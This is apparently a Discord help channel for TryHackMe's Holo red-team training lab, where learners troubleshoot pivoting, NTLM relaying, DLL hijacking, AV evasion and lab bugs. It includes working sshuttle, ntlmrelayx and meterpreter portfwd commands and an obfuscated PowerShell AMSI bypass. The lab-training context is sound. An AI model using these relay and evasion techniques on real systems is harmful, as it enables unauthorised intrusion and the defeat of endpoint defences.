case i suck inreport writing smh

livid shoal
wind bobcat
#

I wouldn't even bother submitting an empty report, the minute someone submits a report with more than an nmap scan, you're going to to get kicked down to the last place kek

weak rapids
#

lmao yea ik

#

i want to make a full report for wreath as report practise

livid shoal
wind bobcat
#

if you lack major details (for example, a screenshot of you accessing the domain controller), then it'll negativity impact you. Remember, irl there is no flag.txt

livid shoal
wind bobcat
#

some things don't need to be patched

#

some things aren't exactly patchable

livid shoal
wind bobcat
#

some technologies can be deployed to remediate vulnerabilities (if you reference the task, it told you to scan smb for something)

livid shoal
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

wind bobcat
#

I would accept that kekw

#

too bad Microsoft said no

lone spruce
#

There is like one fatal flaw that you can say to patch

#

it’s definitely referenced in the task

maiden briar
#

So I've got portfwd set up and all, but get conn refused when using psexec/smbexec. I've disabled my chisel tunneling so ntlmrelayx.py could use port 1080. What else should I check?

wind bobcat
#

sshuttle > chisel for pivoting with this setup

livid shoal
livid shoal
wind bobcat
#

yes

#

proxy chains supports multiple config files

#

but the catch is you need to install proxy chainsng iirc

maiden briar
#

damb, I was starting to believe in chisel supremacy

#

tyty

#

still getting conn refused. Just to double check, I'm shuttled into L-SRV01, have ntlmrelayx running, which seems good, anything else I'm missing? EDIT: forgot to say about metasploit portfwd, it's enabled

livid shoal
wind bobcat
#

remember to start ntlmrelayx before port forwarding
remember to add the smb2support flag in ntlmrelayx

#

if you port forwarded before enabling ntlmrelayx, reboot PC-FILESRV01

maiden briar
#

ah okk tyty

#

is the psexec error that was being reffered to [-] Authenticated as Guest. Aborting [*] Opening SVCManager on 10.200.186.30..... [-] Error performing the uninstallation, cleaning up?

#

lol yeah nvm

maiden briar
#

yeah I got it now lol, tyty

#

shuttle keeps dying b4 i get flag

Chisel supremacy

#

LETS GOOOOO

livid shoal
#

@wind bobcat can we use a random address?

#

in the report

#

?

livid shoal
wind bobcat
#

uh

#

not really needed?

livid shoal
upper rock
woven lava
#

Does the webserver on S-SRV01 really check the type of files being uploaded?

livid shoal
#

it will throw a weird error in other case as far as i remember from memory

woven lava
# livid shoal yes

Well I just reset my network to verify this and I didn't face any trouble uploading the php file

woven lava
#

I'll wait for the creators to verify this

zenith delta
#

Can someone let me know what im doing wrong with scanning the network. I am on 176 subnet or am i crazy? Trying the nmap scan suggested in the walkthrough and this: nmap -n -sn -vv 10.200.176.0/24 -oG - | grep -i 'up' which worked a few weeks ago when i started this, returns everything down. Just coming back and reset progress. I triple checked my vpn connection and I am connected to the hololive network. thank you!

lone spruce
#

Is the network started?

zenith delta
#

ya. was reset 28min ago too.

lone spruce
#

If you reset progress did you regen your config file?

zenith delta
#

i have not. ill do that

#

that was the issue. ty

woven lava
#

Hey @lone spruce, sorry for the bother man, but can you confirm if there's any filtering for images on S-SRV01?

wind bobcat
#

JavaScript, yo

#

gotta drop it

woven lava
#

So am a tad bit confused about the report part.

woven lava
#

I didn't need any sorta filtering

lone spruce
#

wacky

woven lava
#

To bypass the "image only" restriction.

#

Actually, now that I think about it, I never actually faced an issue with that.

#

Can this be a Brave thing?

lone spruce
#

probably not?

#

if you intercept with burp what does it respond with?

woven lava
#

Yeah, doesn't make sense.

woven lava
#

But so far, I haven't have any issue except for the usual blocking when you upload a simple and obvious payload

livid shoal
twin karma
#

how can i restart the vulnerable app to run the malicious dll file ?

wind bobcat
#

you dont

twin karma
wind bobcat
#

yes

nocturne rover
#

hello is it normal that the web app 10.200.162.31 let me upload any files without even bypass the filter?

twin karma
# wind bobcat yes

i've been waiting for almost 30 minutes and nothing happen, should i try something else and wait another 30 minutes ?!

nocturne rover
#

well the thing that is happening is the following when you press to upload an image you get redirected to the file upload url but the filter is not present in this page so we can freely upload anything

#

without even try to bypass it lol

maiden briar
#

what if you wanted to go to DC but smbexec said STATUS_SHARING_VIOLATION

#

I got the flag, but can't hold a stable shell long enough for other stuff

wind bobcat
wind bobcat
maiden briar
#

That's where my stuff crashes

wind bobcat
#

interesting, you could try a reverse shell

twin karma
wind bobcat
#

if you search for hta in metasploit, it's quick and easy

maiden briar
#

Awesome ty, would that still work even if I don't have access anymore? everytime I try to exec now I get no chance for code exec

#

ah wait, I can just relay secretsdump lmao
ty all for da help

livid shoal
#

@wind bobcat hey, so it is written that we dont have to use printnightmare or any kind of loud exploits but ntlm one is the loudest exploit lol ? Do we have to write that we had a permission to use it?

rugged leaf
#

can someone tell me what .dll vulnerable

wise raft
#

10.200.189.33 is down

#

it happens a lot and i have to start all over from the beginning

rugged leaf
#

i can't get the dll to run

#

i keep getting Meterpreter session 1 closed. Reason: Died

lone spruce
#

how are you creating it?

outer onyx
outer onyx
outer onyx
#

The lab is completely buggy

lone spruce
#

I have a feeling we’re maxing out our resource limits on the box

outer onyx
#

😭

livid shoal
#

maybe

#

lol

twin karma
#

i generated a dll payload with msfvenom and put it in ||the desktop and name it to kavremoverENU.dll||, am i do the right thing? Because there is no connection received

lone spruce
#

antivirus

twin karma
livid shoal
#

it happened with me once

#

worked fine after that everytime

twin karma
livid shoal
twin karma
#

ok i'll try that, thanks

livid shoal
#

never felt a need for it

lone spruce
#

?

#

what kind of dll did you use?

#

its intended to have AV enabled. Someone might have disabled it

twin karma
#

it is disabled for me and the payload not working

livid shoal
livid shoal
#

real time protection was disabled

lone spruce
#

ugh, Ill have to add that to my list to fix

livid shoal
#

lol it would become difficult

#

😅

#

tho yea av disabled seemed weird during the first try too

lone spruce
#

As always we suggest testing your payload first before attempting to bring it into the environment

twin karma
#

i do and it's working in my environment

lone spruce
#

kekw I think we straight up just crashed defender

lone spruce
twin karma
#

more than 30 minutes

lone spruce
#

If its still not working then I suggest a reset. The scheduled task can be wacky

rugged leaf
#

how do you reset the network?

lone spruce
#

The reset button

rugged leaf
#

i can't get my Reverse Shell to connet back to me for task 43

#

also does the dll need to be 32bit or 64bit

livid shoal
#

there

rugged leaf
#

??

#

well i have try both and it did not connet back, not at the same time

livid shoal
rugged leaf
#

Are you talking about the attacker or victim system?

nocturne rover
#

cry do you suggest to test the amsi bypass etc to our vm first ?

livid shoal
#

I mean u dont go into war without preparing for it lol

nocturne rover
#

exactly!!! wise words

vapid girder
#

@twin karma is it working for you, the dll hijack? if not pm me for help

vapid girder
#

@rugged leaf it needs to be 32bit, 64bit will not work

zenith delta
#

wow im so lost in the amsi part

rugged leaf
#

just the follow task 40 in the wreath room

tardy idol
#

whoever made the S-SRV01 clap clap clap well done. I can't get the foothold at this point. I can||upload files, but can't get anything to execute or load properly||

#

network reset 10.200.186.0/24 plz

rugged leaf
#

a MSF Venom exe shell work fine on PC-FILESRV01 but i can't get dll one working

#

am i placing it in the folder becasue i can get the .exe one working and before you ask i did not use the same ports for .exe and .dll payload

#

@zenith delta just the follow task 40 in the wreath network room that what i did, PHP Payload Obfuscation

upper rock
#

Task 35: Two of the same sentence:

zenith delta
#

thank you very much

lone spruce
#

@wind bobcat I stg. Look at this

twin karma
#

finally, i complete the hololive network it's an amazing room and have a lot of new ideas, But it has many disadvantages it's so slow and has a lot of errors, almost in every machine you compromised you will face an error and the problem that you should get 3 votes to reset the network that is so annoying for me because of errors and the laggy machines

wind bobcat
rugged leaf
livid shoal
#

🥳

livid shoal
#

try giving it another shot.

#

its easy the second time :)

austere grotto
#

Hi! Can someone kindly post a screenshot of the task regarding the submission and deadline of the red team assessment report ? I had terminated my VIP subscription last week

austere grotto
#

Yes, greatly appreciated!

worn nova
#

Hi anyone, can you give me some hint? I started a holo few minute ago. I connected to the holo network and the access page on THM also shown it connected. i tried to use nmap as guilde and also ping the ip. but i can not ping to the live host of holo network. Is there any problem.

upper rock
worn nova
#

10.200.69.33 or 10.200.69.0/24 this is what i am testing.

upper rock
#

so that you get on another subnet

#

and then regenerate your openvpn file

worn nova
#

Oh.

#

thanks you.

#

let me try it.

upper rock
#

np :)

worn nova
#

Hi Bro, when i left and rejoin the subnet 69 still there. it doesn't provide a new subnet as you said.

upper rock
#

It should've worked, I think someone else faced the same issue

#

Try rejoining etc again until you get a new subnet, not sure tho

#

@wind bobcat ??

worn nova
#

wow. this is weird thing. when i left. at view page i got subnet 68

#

but when i click to join. it changes to subnet 69. 😢

upper rock
#

weird

worn nova
#

10 times leave and join without working.

#

😢 upset

wind bobcat
clear zephyr
#

Do you mean the subnet changes when you join the room?

noble thunder
#

Hey, I cannot download the vpn file for Holo
It always gives me a 404

hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

thorn willow
upper rock
#

In task 39, it says: ```txt
Various teams may approach situational awareness, but we...

But isn't it supposed to be:
```txt
Various teams may approach situational awareness differently, but we...
lone spruce
#

@outer junco @clear zephyr @frigid nacelle do you all have any insight into what is happening with this content? We are getting a ton of weird bugs going on in the task contents and it’s not us

frigid nacelle
#

Let me check.

upper rock
#

Someone tried to hack tryhackme kekw jkjk

lone spruce
#

There are a bunch of others in this channel just like that

#

Also tasks moving around

frigid nacelle
#

Looking into it.

worn nova
#

@wind bobcat @thorn willow i have just rejoined but it's the same. nothing change. that kinds of weird.

#

before click button join room. i saw on the picture that it's subnet 68. but when i clicks to join then i got sub 69. @@

thorn willow
#

@worn nova are you sure its 68 before you join? i thought so aswell, but i think its just the white line making it hard to see 😄
and did you wait before rejoining the room after leaving? worked for me after ~ two hours, twice actually (had some weird issue with subnet 189 aswell)
i also regenerated the openvpn config file and relogged, but im not sure if this is necessary tho

#

sorry for not being more helpful, was trial and error for me aswell

lone spruce
#

TLDR 1/2 people who can fix this are out rn

#

@clear zephyr can you add more networks? Seems we’re out again

wind bobcat
#

and or bump the max number of people allowed in a subnet?

lone spruce
wind bobcat
#

doubt that there's more than 1 person a subnet on at the time

upper rock
#

If it's any help I haven't seen any activity (except mine) on .107, noone else than me have voted for a reset and there haven't been any files there except the ones that I put there

#

on the machines on the network ^

lone spruce
#

it has seemed to me that .33 had been struuuuuggling

clear zephyr
#

So no one should be landing on the .68 subnet

#

Please let me know if it's happens

#

Any other ones should be working ok

#

Unless anyone is facing issues?

candid pendant
#

guys can u please vote for reset? the machine is stuck

lone spruce
#

Resets are not universal between subnets. Please specify the subnet you need reset

tardy idol
#

dll hijacking is kicking my butt. The method I know how to do it doesn't work because I can't get procmon to start

livid shoal
#

:)

tardy idol
#

Would like to know how to do recon without any gui tools but whatever spend 7 days trying to do that and got nowhere

#

@livid shoal just a butch of hey that's never installed by default haha

livid shoal
#

then run that

#

file in your own windows vm

#

with procmon installed

#

:)

tardy idol
#

and have it be blocked need to run with admin perms

#

kek

livid shoal
tardy idol
#

oh

livid shoal
#

:)

tardy idol
#

is gui tools like procmon the only way

#

it's really easy to find what process/programs are missing dlls but hard to find where the dll is

livid shoal
#

its right in front of you

tardy idol
#

Well thanks for the help. Will still try to find a way to do it without procmon is like 10% of the time

willow zinc
#

Hi i have problems with the vpn

#

i cannot download it

#

it says that has been lost in the matrix

lone spruce
#

It’s not hiding anything

candid pendant
#

I need a reset please, subnet 192.168.69. the machine is stuck again

#

my subnet is 10.50.70

quiet raft
lone spruce
noble thunder
#

hey, i cannot download the config for holo, 404

willow zinc
#

me too

#

i have the old one but the network subnet changed

zenith delta
upper rock
#

and regenerate your openvpn file

zenith delta
#

ok thanks

tardy idol
#

@lone spruce can I dm you DM you?

lone spruce
#

Sure

#

There’s really no reason to though

low tree
#

i have issue working with mimikatz on S-SRV01 after uploding it on the target by ussing Covenant (as mentionned on the task) he trigger AV and i'm not able to use it, i tried to disable Win defender but was not succesfull and seems that command's like "MpPreference" is disable too. So do i really need to find a way to disable WinDef? or should i found an Exclusife folder to be able to use Mimikatz?

lone spruce
#

My recommendation would be to clean it

low tree
#

cleaning Mimikatz in the same way as the Grunt?

#

hmmm ok i see i'll try to find a way to clean it thanks

lone spruce
#

Same concepts apply to everything

nocturne rover
#

cry i am on the way to pass the hash of user in srv01 in the rest of the network

#

yet the hash is not working in 10.200.162.35

lone spruce
#

It probably is

#

Evil winrm probably isn’t

#

Use an rdp session instead

tardy idol
#

how do I give rep again?

nocturne rover
#

cry is it normal to not get in via rdp in file server with the creds i found via mimikatz?

#

nevermind it worked after 10 times lol

nocturne rover
#

Well can i got in via rdp but you need to change the domain to holo.live and then use the creds

#

The funny thing is why when i scan the host .35 .32 they dont show any open ports even when i pivot into the network via sshuttle

tardy idol
#

Reset for 10.200.186.0/24 Please.

vernal veldt
#

can I ask someone who has done Task 28 a question to see if im crazy?

tardy idol
#

@vernal veldt sure

zenith delta
#

I have a problem in the Task 20. I understand the privesc is done with do***r, but when I run the GTFobins, i does not exploit and says "the input device is not a TTY". Can someone help me?

#

I changed the image ID by "alpine" and get in as root but when I execute a command it freezes

lone spruce
#

more than likely its because you didnt upgrade your shell

#

did you follow the steps in task 14?

wise raft
#

I'm doing the ntlm relaying in task 47

#

I'm not reciveing smb connection after running ntlmrelay

#

Command for pivoting : sshuttle -r linux-admin@10.200.194.33 -x 10.200.194.33 0.0.0.0/0

#

Command for ntlm relay : ntlmrelayx.py -t smb://10.200.194.30 -smb2support -socks

#

Command for portfoward : │meterpreter > portfwd add -R -L 0.0.0.0 -l 445 -p 445

#

I have also stopped the services and rebooted the machine as written in the blog by spookysec

tardy idol
#

@wise raft does the portfwd command fail for you with [-] Failed to create relay: The address is already in use or unavailable: (0.0.0.0:445). even when you check with netstat and nothing else is listening on that port on everything?

wise raft
#

@tardy idol portfwd didn't fail, it is executed successfully and I start to see port 445 open with netstat on the FILE-SRV machine, which means everything is ok

tardy idol
#

it worked once than gave up kek

tardy idol
vernal veldt
#

can someone who has doen the labs please advise me on how to upload a grunt? I am so confused on those 3 tasks

tardy idol
#

depends on what payload you use.

vernal veldt
#

tried adding the PS payload to the working AMSI bypass code and it went way way over the obfuscation limit

wise raft
tardy idol
#

Is S-SRV02 not apart of scope anymore?

lone spruce
#

It is

#

but its not operational

vernal veldt
#

Thanks @wise raft I’m still confused on how to add that to a cov launcher.

hollow steepleBOT
#

Gave +1 Rep to @wise raft

lone spruce
#

You just put it all into a Powershell file? What are you confused about?

vernal veldt
#

the obfuscation limit, a grunt PS stager + amsi bypass is 30K chars

tardy idol
#

nvm got it read man reEAD

wind bobcat
#

it's not going to be fixed.

vernal veldt
#

will that report end up being the writeup for the lab you think?

lone spruce
zenith delta
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

thorn willow
#

When executing the grunt (on own vm), i always get this error msg. did some research but im kinda lost tbh
any hint on what i might be doing wrong?

fervent plaza
#

@thorn willow I get the message that I've an invalid character in my URI-Path.
Already tried some possible solutions I found online.
Will try some more and write here if I found one, maybe that'll lead to a solution for your error 🙂

thorn willow
hollow steepleBOT
#

Gave +1 Rep to @fervent plaza

thorn willow
#

You can list all docker images available on the system, there's one you can use. You should find the syntax online easiely

#

Are you getting a specific error?

#

was the first time for me too 😄 no worries

#

replace "alpine" in the command with the available docker image you found

#

You're welcome

zenith delta
#

Any chance someone will talk to me about this AMSI bypass stuff for a bit?

#

I've been beating myhead against the wall for over a week now

lone spruce
#

How are you stuck

zenith delta
#

well the code for the second bypass doesnt trigger the amsitrigger

#

and I've searched for a bunch of other bypasses and put them at the top of the grunt launcher code

#

but I cant for the life of me get anything to work

#

my current iteration is using this amsi bypass: $y="5492868772801748688168747280728187173688878280688776828"
$z="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($y+$z).
substring(($*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($y+$z).
substring(($
*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)

#

which according to threatcheck (amsi) and amsitrigger its clean

#

so I put that on top of a powershell launcher generated by coventant. threatcheck then shows me "[IO.Compression.CompressionMode]::Decompress" as bad bytes

#

I tried turning that into a type accelerator and that just caused errors about unknown types. I tried that both in the script and as code prior to running the script

lone spruce
#

I would just stay away from that bypass

#

it’s not supported by the room

zenith delta
zenith delta
zenith delta
vernal veldt
#

If you figure it out plz let me know I am so curious how that works @zenith delta I have a working amsi bypass but uploading a cov stager is not making sense

zenith delta
vernal veldt
#

This is prbly the best lab ive done yet. Blows Wreath out of the water

lone spruce